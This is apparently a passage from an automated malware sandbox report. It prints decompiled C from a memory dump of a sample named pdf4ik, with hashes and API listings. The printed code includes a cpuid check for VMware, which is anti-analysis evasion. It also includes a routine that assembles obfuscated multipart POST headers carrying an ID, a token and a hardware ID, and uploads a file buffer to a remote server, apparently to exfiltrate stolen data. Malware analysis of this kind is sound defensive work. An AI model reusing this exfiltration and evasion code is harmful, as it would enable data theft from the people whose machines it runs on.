*(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[5] & 0x000000ff ^ ((((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[4] & 0x000000ff ^ (((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4);
							_t46 =  &(_t46[8]);
							_t47 = _t47 - 8;
							_t80 = _t80 - 1;
						} while (_t80 != 0);
					}
					if(_t47 != 0) {
						do {
							_t27 = _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4);
							_t46 =  &(_t46[1]);
							_t47 = _t47 - 1;
						} while (_t47 != 0);
					}
					return  !_t27;
				} else {
					return 0;
				}
			}








                                        0x29d8bc60
                                        0x29d8bc60
                                        0x29d8bc62
                                        0x29d8bc68
                                        0x29d8bc6d
                                        0x29d8bc75
                                        0x29d8bc80
                                        0x29d8bd28
                                        0x29d8bd2f
                                        0x29d8bd32
                                        0x29d8bd35
                                        0x29d8bd35
                                        0x29d8bd3c
                                        0x29d8bd3f
                                        0x29d8bd41
                                        0x29d8bd4f
                                        0x29d8bd56
                                        0x29d8bd57
                                        0x29d8bd57
                                        0x29d8bd41
                                        0x29d8bd5d
                                        0x29d8bc64
                                        0x29d8bc66
                                        0x29d8bc66

                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 16fda53b70cea74b69500a5086dd4c9ae772247abf7394d237f3e72f772f45e1
                                        • Instruction ID: 51f664644f1dc2f680995a5ca5bffdfe7746acf2173bf0be8d3c57e55413b060
                                        • Opcode Fuzzy Hash: 16fda53b70cea74b69500a5086dd4c9ae772247abf7394d237f3e72f772f45e1
                                        • Instruction Fuzzy Hash: 11218E338788F701E3509A369C046A2A7D3DBCA247FBF85B9C684C7543D63DD103A121
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D81190 Relevance: .1, Instructions: 52COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 71%
                                        			E29D81190(intOrPtr __edx) {
				signed int _v8;
				char _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				intOrPtr _v36;
				char _v40;
				void* __ebx;
				void* __esi;
				signed int _t22;
				intOrPtr _t30;
				char _t36;
				intOrPtr _t39;
				intOrPtr* _t41;
				intOrPtr _t42;
				signed int _t43;

				_t37 = __edx;
				_t22 =  *0x29dd5664; // 0xd9555f04
				_v8 = _t22 ^ _t43;
				asm("cpuid");
				_t41 =  &_v40;
				 *_t41 = 1;
				 *((intOrPtr*)(_t41 + 4)) = _t30;
				 *((intOrPtr*)(_t41 + 8)) = 0;
				 *((intOrPtr*)(_t41 + 0xc)) = __edx;
				_t26 = _v32 & 0x80000000;
				if((_v32 & 0x80000000) == 0x80000000) {
					asm("cpuid");
					 *_t41 = 0x40000000;
					 *((intOrPtr*)(_t41 + 4)) = _t30;
					 *((intOrPtr*)(_t41 + 8)) = 0;
					 *((intOrPtr*)(_t41 + 0xc)) = __edx;
					_v24 = _v36;
					_t36 = 0;
					_v16 = _v28;
					_v20 = _v32;
					_v12 = 0;
					_t17 = _t36 + 0xd; // 0xd
					_t26 = _t17;
					while(1) {
						_t37 =  *((intOrPtr*)(_t43 + _t36 - 0x14));
						_t20 = _t36 + "VMwareVMware"; // 0x61774d56
						if( *((intOrPtr*)(_t43 + _t36 - 0x14)) !=  *_t20) {
							goto L4;
						}
						_t26 = _t26 - 4;
						_t36 = _t36 + 4;
						if(_t26 >= 4) {
							continue;
						}
						goto L4;
					}
				}
				L4:
				_pop(_t42);
				return E29DADF46(_t26, _t30, _v8 ^ _t43, _t37, _t39, _t42);
			}





















                                        0x29d81190
                                        0x29d81196
                                        0x29d8119d
                                        0x29d811a8
                                        0x29d811ab
                                        0x29d811ae
                                        0x29d811b0
                                        0x29d811b3
                                        0x29d811b6
                                        0x29d811bc
                                        0x29d811c6
                                        0x29d811cf
                                        0x29d811d1
                                        0x29d811d3
                                        0x29d811d6
                                        0x29d811d9
                                        0x29d811e5
                                        0x29d811e8
                                        0x29d811ea
                                        0x29d811ed
                                        0x29d811f0
                                        0x29d811f3
                                        0x29d811f3
                                        0x29d81200
                                        0x29d81200
                                        0x29d81204
                                        0x29d8120a
                                        0x00000000
                                        0x00000000
                                        0x29d8120c
                                        0x29d8120f
                                        0x29d81215
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d81215
                                        0x29d81200
                                        0x29d81217
                                        0x29d8121a
                                        0x29d81226

                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 151d63c262abd5c6492f342dc419e9742d8b2f5d9790b4dfe8b1f86bbedc3811
                                        • Instruction ID: 2af4fc95627721255c261936a2c6fe7d6b690323dd554b4c5d90a4b81baeccae
                                        • Opcode Fuzzy Hash: 151d63c262abd5c6492f342dc419e9742d8b2f5d9790b4dfe8b1f86bbedc3811
                                        • Instruction Fuzzy Hash: 751118B190420A9FDB18CF99D5826AEFBF0FB48314F20C56ED45AE7701E634AA468B54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D98000 Relevance: 156.2, APIs: 70, Strings: 19, Instructions: 446stringnetworkmemoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 62%
                                        			E29D98000(intOrPtr __ecx, long __edx, char* _a4, intOrPtr _a24, intOrPtr _a32, char* _a36, short _a40, void* _a44, int _a48, CHAR* _a52) {
				DWORD* _v8;
				char _v16;
				signed int _v20;
				char _v520;
				char _v1032;
				char _v1532;
				void _v1788;
				char _v2788;
				char _v3788;
				char _v4788;
				void _v6788;
				char _v11788;
				intOrPtr _v11796;
				DWORD* _v11800;
				char _v11816;
				void* _v11820;
				void* _v11824;
				long _v11828;
				void* _v11832;
				int _v11836;
				long _v11840;
				CHAR* _v11844;
				void _v11848;
				intOrPtr _v11852;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t124;
				signed int _t125;
				CHAR* _t134;
				char* _t136;
				void* _t137;
				void* _t167;
				CHAR* _t172;
				int _t212;
				long _t218;
				long _t224;
				intOrPtr _t234;
				void* _t235;
				void* _t236;
				void* _t238;
				CHAR* _t289;
				void* _t290;
				void* _t291;
				char* _t293;
				void* _t294;
				void* _t295;
				long _t299;
				signed int _t300;
				void* _t301;
				void* _t303;
				void* _t305;

				_push(0xffffffff);
				_push(E29DC2233);
				_push( *[fs:0x0]);
				E29DBCDB0(0x2e3c);
				_t124 =  *0x29dd5664; // 0xd9555f04
				_t125 = _t124 ^ _t300;
				_v20 = _t125;
				_push(_t125);
				 *[fs:0x0] =  &_v16;
				_t234 = _a32;
				_t293 = _a36;
				_v11824 = _a44;
				_v11852 = __ecx;
				_v11828 = __edx;
				_v11836 = _a48;
				_v11844 = _a52;
				_v8 = 0;
				E29DB5640( &_v11788, 0, 0x1388);
				E29DB5640( &_v1532, 0, 0x1f4);
				E29DB5640( &_v1032, 0, 0x200);
				_t134 = HeapAlloc(GetProcessHeap(), 0, 0x800000);
				_t270 =  &_v520;
				_t289 = _t134;
				E29DB5640( &_v520, 0, 0x1f4);
				_t136 = _a4;
				_t303 = _t301 + 0x30;
				if(_a24 < 0x10) {
					_t136 =  &_a4;
				}
				_t137 = InternetOpenA(_t136, 1, 0, 0, 0);
				_v11832 = _t137;
				_v11848 = 0x1d4c0;
				InternetSetOptionA(_t137, 2,  &_v11848, 4);
				_push("https://");
				_push(_t234);
				_v11840 = 0x100;
				_v11820 = 0;
				if( *0x29dd8550() == 0) {
					_v11820 = 1;
				}
				_t312 = _v11832;
				if(_v11832 == 0) {
					_t235 = _v11840;
					goto L28;
				} else {
					lstrcatA( &_v1532, E29DA46C0(0x10, _t289, _t312));
					lstrcatA(_t289, "\r\n");
					lstrcatA(_t289, "------");
					lstrcatA(_t289,  &_v1532);
					lstrcatA(_t289, "--");
					lstrcatA(_t289, "\r\n");
					lstrcatA( &_v520, "Cont");
					lstrcatA( &_v520, "ent-Typ");
					lstrcatA( &_v520, "e: multip");
					lstrcatA( &_v520, "art/for");
					lstrcatA( &_v520, "m-data; ");
					lstrcatA( &_v520, "boun");
					lstrcatA( &_v520, "dary=");
					lstrcatA( &_v520, "----");
					lstrcatA( &_v520,  &_v1532);
					_t238 = _v11820;
					_push(0);
					_push(0);
					_push(3);
					_push(0);
					_push(0);
					if(_t238 == 0) {
						_t252 = _a40;
						_t270 = _v11832;
						_t167 = InternetConnectA(_v11832, _t293, _a40, ??, ??, ??, ??, ??);
						_v11820 = _t167;
						_t294 = _t167;
					} else {
						_t270 = _a40;
						_t294 = InternetConnectA(_v11832, _t293, _a40, ??, ??, ??, ??, ??);
						_v11820 = _t294;
					}
					if(_t294 == 0) {
						_t235 = _v11840;
					} else {
						_push(0);
						if(_t238 == 0) {
							_t252 = _v11824;
							_push(0x400100);
							_push(0);
							_push(0);
							_push("HTTP/1.1");
							_push(_v11824);
						} else {
							_push(0xc00100);
							_push(0);
							_push(0);
							_push("HTTP/1.1");
							_push(_v11824);
						}
						_t235 = HttpOpenRequestA(_t294, "POST", ??, ??, ??, ??, ??, ??);
						if(_t235 != 0) {
							E29DB5640( &_v2788, 0, 0x3e8);
							_t305 = _t303 + 0xc;
							lstrcatA( &_v2788, "X-Id: ");
							_t172 = E29D8E880(_t252,  &_v11816);
							_v8 = 1;
							if(_t172[0x14] >= 0x10) {
								_t172 =  *_t172;
							}
							lstrcatA( &_v2788, _t172);
							_v8 = 0;
							if(_v11796 >= 0x10) {
								_push(_v11816);
								E29DADF3B();
								_t305 = _t305 + 4;
							}
							_v11796 = 0xf;
							_v11800 = 0;
							_v11816 = 0;
							HttpAddRequestHeadersA(_t235,  &_v2788, lstrlenA( &_v2788), 0x20000000);
							E29DB5640( &_v3788, 0, 0x3e8);
							lstrcatA( &_v3788, "X-Token: ");
							lstrcatA( &_v3788, _v11844);
							HttpAddRequestHeadersA(_t235,  &_v3788, lstrlenA( &_v3788), 0x20000000);
							E29DB5640( &_v4788, 0, 0x3e8);
							lstrcatA( &_v4788, "X-hwid: ");
							lstrcatA( &_v4788, _v11836);
							HttpAddRequestHeadersA(_t235,  &_v4788, lstrlenA( &_v4788), 0x20000000);
							lstrcatA( &_v1032, "------");
							lstrcatA( &_v1032,  &_v1532);
							lstrcatA( &_v1032, "\r\n");
							lstrcatA( &_v1032, "Content-Disposition: form-data; name=\"");
							lstrcatA( &_v1032, "file");
							lstrcatA( &_v1032, "\"\r\n\r\n");
							_v11836 = lstrlenA(_t289);
							_t299 =  &(( &(_v11836[_v11828]))[lstrlenA( &_v1032)]);
							_v11824 = HeapAlloc(GetProcessHeap(), 0, _t299);
							E29DB0010(_v11824,  &_v1032, lstrlenA( &_v1032));
							E29DB0010(_v11824 + lstrlenA( &_v1032), _v11852, _v11828);
							_t212 = lstrlenA(_t289);
							E29DB0010(lstrlenA( &_v1032) + _v11828 + _v11824, _t289, _t212);
							_t303 = _t305 + 0x3c;
							_t291 = 0;
							do {
								_t218 = lstrlenA( &_v520);
								_t270 =  &_v520;
								HttpSendRequestA(_t235,  &_v520, _t218, _v11824, _t299);
								if(HttpQueryInfoA(_t235, 0x13,  &_v1788,  &_v11840, 0) == 0) {
									goto L20;
								} else {
									_push("200");
									_t270 =  &_v1788;
									_push( &_v1788);
									if( *0x29dd8550() != 0) {
										goto L20;
									}
								}
								break;
								L20:
								Sleep(0x7530);
								_t291 = _t291 + 1;
							} while (_t291 < 6);
							if(InternetReadFile(_t235,  &_v6788, 0x7cf,  &_v11828) != 0) {
								while(1) {
									_t224 = _v11828;
									if(_t224 == 0) {
										goto L28;
									}
									 *((char*)(_t300 + _t224 - 0x1a80)) = 0;
									lstrcatA( &_v11788,  &_v6788);
									_t270 =  &_v6788;
									if(InternetReadFile(_t235,  &_v6788, 0x7cf,  &_v11828) != 0) {
										continue;
									} else {
									}
									goto L28;
								}
							}
							L28:
							_t294 = _v11820;
						}
					}
				}
				InternetCloseHandle(_t235);
				InternetCloseHandle(_t294);
				InternetCloseHandle(_v11832);
				if(_a24 >= 0x10) {
					_push(_a4);
					E29DADF3B();
				}
				 *[fs:0x0] = _v16;
				_pop(_t290);
				_pop(_t295);
				_pop(_t236);
				return E29DADF46( &_v11788, _t236, _v20 ^ _t300, _t270, _t290, _t295);
			}























































                                        0x29d98003
                                        0x29d98005
                                        0x29d98010
                                        0x29d98016
                                        0x29d9801b
                                        0x29d98020
                                        0x29d98022
                                        0x29d98028
                                        0x29d9802c
                                        0x29d98035
                                        0x29d98038
                                        0x29d9803b
                                        0x29d98044
                                        0x29d9804d
                                        0x29d98053
                                        0x29d98059
                                        0x29d9806d
                                        0x29d98074
                                        0x29d98087
                                        0x29d9809a
                                        0x29d980b0
                                        0x29d980bb
                                        0x29d980c4
                                        0x29d980c6
                                        0x29d980cb
                                        0x29d980ce
                                        0x29d980d5
                                        0x29d980d7
                                        0x29d980d7
                                        0x29d980e3
                                        0x29d980f5
                                        0x29d980fb
                                        0x29d98105
                                        0x29d9810b
                                        0x29d98110
                                        0x29d98111
                                        0x29d9811b
                                        0x29d9812d
                                        0x29d9812f
                                        0x29d9812f
                                        0x29d98139
                                        0x29d98140
                                        0x29d9863e
                                        0x00000000
                                        0x29d98146
                                        0x29d98158
                                        0x29d98164
                                        0x29d98170
                                        0x29d9817e
                                        0x29d9818a
                                        0x29d98196
                                        0x29d981a8
                                        0x29d981ba
                                        0x29d981cc
                                        0x29d981de
                                        0x29d981f0
                                        0x29d98202
                                        0x29d98214
                                        0x29d98226
                                        0x29d9823a
                                        0x29d98240
                                        0x29d98246
                                        0x29d98248
                                        0x29d9824a
                                        0x29d9824c
                                        0x29d9824e
                                        0x29d98252
                                        0x29d98270
                                        0x29d98273
                                        0x29d9827c
                                        0x29d98282
                                        0x29d98288
                                        0x29d98254
                                        0x29d98254
                                        0x29d98266
                                        0x29d98268
                                        0x29d98268
                                        0x29d9828c
                                        0x29d98636
                                        0x29d98292
                                        0x29d98292
                                        0x29d98296
                                        0x29d982af
                                        0x29d982b5
                                        0x29d982ba
                                        0x29d982bc
                                        0x29d982be
                                        0x29d982c3
                                        0x29d98298
                                        0x29d9829e
                                        0x29d982a3
                                        0x29d982a5
                                        0x29d982a7
                                        0x29d982ac
                                        0x29d982ac
                                        0x29d982d0
                                        0x29d982d4
                                        0x29d982e8
                                        0x29d982ed
                                        0x29d982fc
                                        0x29d98308
                                        0x29d98312
                                        0x29d98319
                                        0x29d9831b
                                        0x29d9831b
                                        0x29d98325
                                        0x29d9832b
                                        0x29d98335
                                        0x29d9833d
                                        0x29d9833e
                                        0x29d98343
                                        0x29d98343
                                        0x29d98352
                                        0x29d9835c
                                        0x29d98366
                                        0x29d9837c
                                        0x29d98390
                                        0x29d983a4
                                        0x29d983b8
                                        0x29d983d9
                                        0x29d983ed
                                        0x29d98401
                                        0x29d98415
                                        0x29d98436
                                        0x29d98448
                                        0x29d9845c
                                        0x29d9846e
                                        0x29d98480
                                        0x29d98492
                                        0x29d984a4
                                        0x29d984b8
                                        0x29d984d2
                                        0x29d984eb
                                        0x29d98506
                                        0x29d98530
                                        0x29d98539
                                        0x29d9855b
                                        0x29d98560
                                        0x29d98563
                                        0x29d98565
                                        0x29d98574
                                        0x29d9857b
                                        0x29d98583
                                        0x29d985a4
                                        0x00000000
                                        0x29d985a6
                                        0x29d985a6
                                        0x29d985ab
                                        0x29d985b1
                                        0x29d985ba
                                        0x00000000
                                        0x00000000
                                        0x29d985ba
                                        0x00000000
                                        0x29d985bc
                                        0x29d985c1
                                        0x29d985c7
                                        0x29d985c8
                                        0x29d985e9
                                        0x29d985f0
                                        0x29d985f0
                                        0x29d985f8
                                        0x00000000
                                        0x00000000
                                        0x29d98600
                                        0x29d98610
                                        0x29d98622
                                        0x29d98632
                                        0x00000000
                                        0x00000000
                                        0x29d98634
                                        0x00000000
                                        0x29d98632
                                        0x29d985f0
                                        0x29d98644
                                        0x29d98644
                                        0x29d98644
                                        0x29d982d4
                                        0x29d9828c
                                        0x29d9864b
                                        0x29d98652
                                        0x29d9865f
                                        0x29d98669
                                        0x29d9866e
                                        0x29d9866f
                                        0x29d98674
                                        0x29d98680
                                        0x29d98688
                                        0x29d98689
                                        0x29d9868a
                                        0x29d98698

                                        APIs
                                        • _memset.LIBCMT ref: 29D98074
                                        • _memset.LIBCMT ref: 29D98087
                                        • _memset.LIBCMT ref: 29D9809A
                                        • GetProcessHeap.KERNEL32(00000000,00800000), ref: 29D980A9
                                        • HeapAlloc.KERNEL32(00000000), ref: 29D980B0
                                        • _memset.LIBCMT ref: 29D980C6
                                        • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 29D980E3
                                        • InternetSetOptionA.WININET ref: 29D98105
                                        • StrCmpCA.SHLWAPI(?,https://), ref: 29D98125
                                        • lstrcatA.KERNEL32(?,00000000), ref: 29D98158
                                        • lstrcatA.KERNEL32(00000000,29DCFDA8), ref: 29D98164
                                        • lstrcatA.KERNEL32(00000000,------), ref: 29D98170
                                        • lstrcatA.KERNEL32(00000000,?), ref: 29D9817E
                                        • lstrcatA.KERNEL32(00000000,29DCFDB4), ref: 29D9818A
                                        • lstrcatA.KERNEL32(00000000,29DCFDA8), ref: 29D98196
                                        • lstrcatA.KERNEL32(?,Cont), ref: 29D981A8
                                        • lstrcatA.KERNEL32(?,ent-Typ), ref: 29D981BA
                                        • lstrcatA.KERNEL32(?,e: multip), ref: 29D981CC
                                        • lstrcatA.KERNEL32(?,art/for), ref: 29D981DE
                                        • lstrcatA.KERNEL32(?,m-data; ), ref: 29D981F0
                                        • lstrcatA.KERNEL32(?,boun), ref: 29D98202
                                        • lstrcatA.KERNEL32(?,dary=), ref: 29D98214
                                        • lstrcatA.KERNEL32(?,----), ref: 29D98226
                                        • lstrcatA.KERNEL32(?,?), ref: 29D9823A
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 29D98260
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 29D9827C
                                        • HttpOpenRequestA.WININET(00000000,POST,?,HTTP/1.1,00000000,00000000,00400100,00000000), ref: 29D982CA
                                        • _memset.LIBCMT ref: 29D982E8
                                        • lstrcatA.KERNEL32(?,X-Id: ,00000002,?,00000004), ref: 29D982FC
                                        • lstrcatA.KERNEL32(?,00000000), ref: 29D98325
                                        • lstrlenA.KERNEL32 ref: 29D9836D
                                        • HttpAddRequestHeadersA.WININET(00000000,?,00000000), ref: 29D9837C
                                        • _memset.LIBCMT ref: 29D98390
                                        • lstrcatA.KERNEL32(?,X-Token: ,?,?,?,?,?,20000000), ref: 29D983A4
                                        • lstrcatA.KERNEL32(?,?,?,?,?,?,?,20000000), ref: 29D983B8
                                        • lstrlenA.KERNEL32(?,20000000,?,?,?,?,?,20000000), ref: 29D983CA
                                        • HttpAddRequestHeadersA.WININET(00000000,?,00000000), ref: 29D983D9
                                        • _memset.LIBCMT ref: 29D983ED
                                        • lstrcatA.KERNEL32(?,X-hwid: ,?,?,?,?,?,?,?,?,20000000), ref: 29D98401
                                        • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,?,20000000), ref: 29D98415
                                        • lstrlenA.KERNEL32(?,20000000,?,?,?,?,?,?,?,?,20000000), ref: 29D98427
                                        • HttpAddRequestHeadersA.WININET(00000000,?,00000000), ref: 29D98436
                                        • lstrcatA.KERNEL32(?,------,?,?,?,?,?,?,?,?,20000000), ref: 29D98448
                                        • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,?,20000000), ref: 29D9845C
                                        • lstrcatA.KERNEL32(?,29DCFDA8,?,?,?,?,?,?,?,?,20000000), ref: 29D9846E
                                        • lstrcatA.KERNEL32(?,Content-Disposition: form-data; name=",?,?,?,?,?,?,?,?,20000000), ref: 29D98480
                                        • lstrcatA.KERNEL32(?,file,?,?,?,?,?,?,?,?,20000000), ref: 29D98492
                                        • lstrcatA.KERNEL32(?,",?,?,?,?,?,?,?,?,20000000), ref: 29D984A4
                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,20000000), ref: 29D984AB
                                        • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,20000000), ref: 29D984BE
                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,20000000), ref: 29D984D7
                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,20000000), ref: 29D984DE
                                        • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,20000000), ref: 29D984F1
                                        • _memmove.LIBCMT ref: 29D98506
                                        • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,20000000), ref: 29D98523
                                        • _memmove.LIBCMT ref: 29D98530
                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,20000000), ref: 29D98539
                                        • lstrlenA.KERNEL32(?,00000000,00000000), ref: 29D98548
                                        • _memmove.LIBCMT ref: 29D9855B
                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 29D98574
                                        • HttpSendRequestA.WININET(00000000,?,00000000), ref: 29D98583
                                        • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 29D9859C
                                        • StrCmpCA.SHLWAPI(?,200), ref: 29D985B2
                                        • Sleep.KERNEL32(00007530), ref: 29D985C1
                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 29D985E1
                                        • lstrcatA.KERNEL32(?,?), ref: 29D98610
                                        • InternetReadFile.WININET(00000000,00000000,000007CF,?), ref: 29D9862A
                                        • InternetCloseHandle.WININET(00000100), ref: 29D9864B
                                        • InternetCloseHandle.WININET(00000000), ref: 29D98652
                                        • InternetCloseHandle.WININET(00000000), ref: 29D9865F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrlen$Internet$_memset$Http$Request$Heap$CloseHandleHeaders_memmove$AllocConnectFileOpenProcessRead$InfoOptionQuerySendSleep
                                        • String ID: "$----$------$200$Cont$Content-Disposition: form-data; name="$HTTP/1.1$POST$X-Id: $X-Token: $X-hwid: $art/for$boun$dary=$e: multip$ent-Typ$file$https://$m-data;
                                        • API String ID: 2944485271-3064613715
                                        • Opcode ID: 23a440b257f2f66b1b92a64c874ddf0a10f3e3a7f04ef3515fdba50718bcd88e
                                        • Instruction ID: 2b111588f44f9b4fe2668adf81f712adcf83e429122a91f55460bc1f2c669d29
                                        • Opcode Fuzzy Hash: 23a440b257f2f66b1b92a64c874ddf0a10f3e3a7f04ef3515fdba50718bcd88e
                                        • Instruction Fuzzy Hash: C60254B3980254ABDB11EBA4DC8CFDE7778BF58B01F008599F609E7140DBB49A859F60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D99A80 Relevance: 77.4, APIs: 42, Strings: 2, Instructions: 351stringfileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 46%
                                        			E29D99A80(intOrPtr __ecx, intOrPtr __edx, CHAR* _a4, CHAR* _a8, CHAR* _a12, intOrPtr* _a16) {
				char _v8;
				char _v16;
				signed int _v20;
				char _v284;
				char _v548;
				intOrPtr _v556;
				char _v560;
				char _v576;
				char _v580;
				CHAR* _v584;
				CHAR* _v588;
				char _v592;
				CHAR* _v596;
				CHAR* _v600;
				intOrPtr _v604;
				intOrPtr* _v608;
				intOrPtr _v612;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t75;
				signed int _t76;
				void* _t80;
				int _t81;
				intOrPtr _t82;
				int _t83;
				signed int _t91;
				void* _t109;
				long _t111;
				void* _t117;
				int _t118;
				CHAR* _t121;
				CHAR* _t124;
